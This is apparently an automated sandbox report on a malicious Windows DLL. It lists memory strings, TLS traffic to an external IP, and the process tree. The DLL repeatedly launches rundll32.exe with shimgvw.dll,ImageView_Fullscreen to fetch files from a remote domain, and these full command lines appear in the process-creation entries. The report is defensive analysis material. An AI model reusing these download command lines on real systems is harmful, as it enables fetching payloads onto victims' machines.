Source: rundll32.exe, 00000005.00000002.3286428074.0000000003170000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3286258610.0000000003080000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3286763260.0000000003190000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3286367088.0000000002F90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3286397413.0000000002F40000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3286293078.0000000002EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtC:
Source: rundll32.exe, 0000000B.00000002.3289283250.0000000008C74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtF
Source: rundll32.exe, 00000005.00000002.3286428074.000000000317A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtM
Source: rundll32.exe, 00000005.00000002.3289519547.0000000008FA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtO
Source: rundll32.exe, 00000005.00000002.3287957318.00000000032C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtPR
Source: rundll32.exe, 00000006.00000002.3289715229.0000000008D34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtQw
Source: rundll32.exe, 0000000B.00000002.3289283250.0000000008CE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtR
Source: rundll32.exe, 00000006.00000002.3286763260.0000000003289000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtT
Source: rundll32.exe, 0000000B.00000002.3286397413.0000000002FB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtZ
Source: rundll32.exe, 00000005.00000002.3289519547.0000000008F42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtdT
Source: rundll32.exe, 00000006.00000002.3286763260.0000000003208000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txte
Source: rundll32.exe, 0000000B.00000002.3286397413.0000000002F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtentdll
Source: rundll32.exe, 00000006.00000002.3286763260.000000000319A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtentdll8
Source: rundll32.exe, 00000005.00000002.3286428074.0000000003170000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtenth
Source: rundll32.exe, 00000006.00000002.3286763260.0000000003208000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtentindowsINetCookies
Source: rundll32.exe, 00000005.00000002.3286428074.00000000031E8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3286397413.0000000002FB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtft
Source: rundll32.exe, 00000006.00000002.3289715229.0000000008CBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtfw
Source: rundll32.exe, 0000000B.00000002.3289283250.0000000008CE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txti
Source: rundll32.exe, 00000005.00000002.3289519547.0000000008FA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtk
Source: rundll32.exe, 00000006.00000002.3289715229.0000000008CBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtrw
Source: rundll32.exe, 00000005.00000002.3289519547.0000000008F42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtry
Source: rundll32.exe, 00000006.00000002.3286558558.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3287828894.0000000003280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txts
Source: rundll32.exe, 00000005.00000002.3289519547.0000000008FA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtt
Source: rundll32.exe, 00000005.00000002.3286428074.00000000031E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtv
Source: rundll32.exe, 00000006.00000002.3286763260.0000000003190000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtx
Source: rundll32.exe, 00000005.00000002.3289519547.0000000008F70000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3289519547.0000000008F85000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3286763260.000000000319A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3289715229.0000000008CFD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3289715229.0000000008CE5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3289283250.0000000008CA1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3289283250.0000000008D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtz
Source: rundll32.exe, 0000000B.00000002.3289283250.0000000008CE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclogY
Source: rundll32.exe, 00000005.00000002.3286153316.0000000003037000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3286159157.0000000002B77000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3286150447.0000000002B37000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclogtxt
Source: rundll32.exe, 0000000C.00000002.3289874951.0000000008844000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3289874951.000000000889F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3286396113.0000000002AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp
Source: rundll32.exe, 00000008.00000002.3289370327.0000000008BE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp$u
Source: rundll32.exe, 0000000C.00000002.3286396113.0000000002AAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp%
Source: rundll32.exe, 00000007.00000002.3289414111.0000000007BA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp(
Source: rundll32.exe, 00000008.00000002.3289919472.0000000008C47000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337289222.0000000008C46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp)
Source: rundll32.exe, 00000007.00000002.3286915382.000000000284A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3286449420.0000000002E3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp0
Source: rundll32.exe, 0000000C.00000002.3286396113.0000000002AAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp08
Source: rundll32.exe, 0000000C.00000002.3289874951.0000000008844000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3289874951.000000000889F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp4
Source: rundll32.exe, 0000000C.00000002.3289874951.000000000889F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp4X
Source: rundll32.exe, 0000000C.00000002.3289874951.0000000008844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp4Zfrh
Source: rundll32.exe, 00000008.00000003.2337362841.0000000008C11000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337408753.0000000008C19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3289712371.0000000008C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp4kJ
Source: rundll32.exe, 00000008.00000003.2337362841.0000000008C11000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337408753.0000000008C19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3289712371.0000000008C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp4s5
Source: rundll32.exe, 00000007.00000002.3286915382.000000000284A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp6
Source: rundll32.exe, 00000007.00000002.3289414111.0000000007B2A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3289370327.0000000008BE3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3289874951.0000000008814000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp6634-1003
Source: rundll32.exe, 00000007.00000002.3289414111.0000000007BA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp7
Source: rundll32.exe, 00000007.00000002.3286915382.00000000028CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp8a5
Source: rundll32.exe, 00000007.00000002.3286915382.000000000284A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp;
Source: rundll32.exe, 0000000C.00000002.3289874951.000000000882B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpA
Source: rundll32.exe, 00000003.00000002.2054157114.0000000002880000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2053873266.0000000000390000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3286915382.0000000002840000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3286404061.00000000026D0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3286340448.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3286449420.0000000002E30000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3286291304.0000000002990000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3286396113.0000000002AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpC:
Source: rundll32.exe, 00000008.00000002.3289919472.0000000008C47000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337289222.0000000008C46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpG
Source: rundll32.exe, 00000007.00000002.3289414111.0000000007BA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpP
Source: rundll32.exe, 00000007.00000002.3286295606.00000000026C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpPR5
Source: rundll32.exe, 0000000C.00000002.3289874951.0000000008814000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpS
Source: rundll32.exe, 00000007.00000002.3289414111.0000000007B5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpc4u
Source: rundll32.exe, 00000007.00000002.3286915382.00000000028B9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3286593843.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337436312.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3286396113.0000000002B1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpent
Source: rundll32.exe, 00000007.00000002.3286915382.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3286593843.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337436312.0000000002EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpft
Source: rundll32.exe, 0000000C.00000002.3286396113.0000000002B1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpg
Source: rundll32.exe, 00000007.00000002.3289414111.0000000007B42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmph
Source: rundll32.exe, 00000008.00000002.3289919472.0000000008C47000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337289222.0000000008C46000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3289874951.0000000008844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpmp
Source: rundll32.exe, 00000008.00000002.3289370327.0000000008BFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpn
Source: rundll32.exe, 0000000C.00000002.3289874951.0000000008814000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpry
Source: rundll32.exe, 00000008.00000002.3288087591.0000000003110000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3288019449.0000000002D40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmps
Source: loaddll32.exe, 00000000.00000002.2078622698.0000000000B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpsC:
Source: rundll32.exe, 00000008.00000002.3286593843.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337436312.0000000002EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpu
Source: rundll32.exe, 0000000C.00000002.3286396113.0000000002B1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpuk
Source: rundll32.exe, 00000007.00000002.3289414111.0000000007BA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpw
Source: rundll32.exe, 00000003.00000002.2054268818.0000000002A5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpxe.muiE
Source: rundll32.exe, 00000007.00000002.3289414111.0000000007B83000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3289414111.0000000007B71000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3289414111.0000000007BA5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337362841.0000000008C11000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3289712371.0000000008C27000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337408753.0000000008C19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3289712371.0000000008C1B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337408753.0000000008C27000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3286396113.0000000002B1B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3289874951.0000000008844000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3289874951.000000000889F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpz
Source: rundll32.exe, 0000000B.00000002.3289283250.0000000008CA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/k
Source: rundll32.exe, 0000000B.00000002.3289283250.0000000008CE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/q
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6B92B3BD0_2_6B92B3BD
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6B93612B0_2_6B93612B
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6B92B07B0_2_6B92B07B
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6B93B8690_2_6B93B869
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6B92B71C0_2_6B92B71C
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6B935C800_2_6B935C80
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F9EB71C3_2_6F9EB71C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F9F5C803_2_6F9F5C80
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F9EB3BD3_2_6F9EB3BD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F9F612B3_2_6F9F612B
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F9EB07B3_2_6F9EB07B
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F9FB8693_2_6F9FB869
Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6B925570 appears 45 times
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6F9E5570 appears 45 times
Source: QEydjQdRxs.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: classification engineClassification label: mal88.evad.winDLL@20/0@1/1
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:432:120:WilError_03
Source: QEydjQdRxs.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\QEydjQdRxs.dll,mydllmain
Source: QEydjQdRxs.dllVirustotal: Detection: 8%
Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\QEydjQdRxs.dll"
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\QEydjQdRxs.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\QEydjQdRxs.dll,mydllmain
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\QEydjQdRxs.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\QEydjQdRxs.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\QEydjQdRxs.dll,mydllmainJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txtJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmpJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\QEydjQdRxs.dll",#1Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txtJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmpJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txtJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmpJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FBF23B40-E3F0-101B-8488-00AA003E56F8}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: QEydjQdRxs.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6B93BF81 push ecx; ret 0_2_6B93BF94
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F9FBF81 push ecx; ret 3_2_6F9FBF94
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00446003 push ecx; iretd 4_2_00446004
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00443513 push ecx; iretd 4_2_00443514
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_004461D3 push ecx; iretd 4_2_004461D4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_004431A3 push ecx; iretd 4_2_004431A4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00446433 push ecx; iretd 4_2_00446434
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_092ED728 push ebx; retf 5_2_092ED7B9
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_092ED708 push ebx; retf 5_2_092ED7B9
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_092ED795 push ebx; retf 5_2_092ED7B9
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_092EFB78 pushad ; iretd 5_2_092EFB79
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_07EDF9B4 push eax; iretd 7_2_07EDF9BD
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
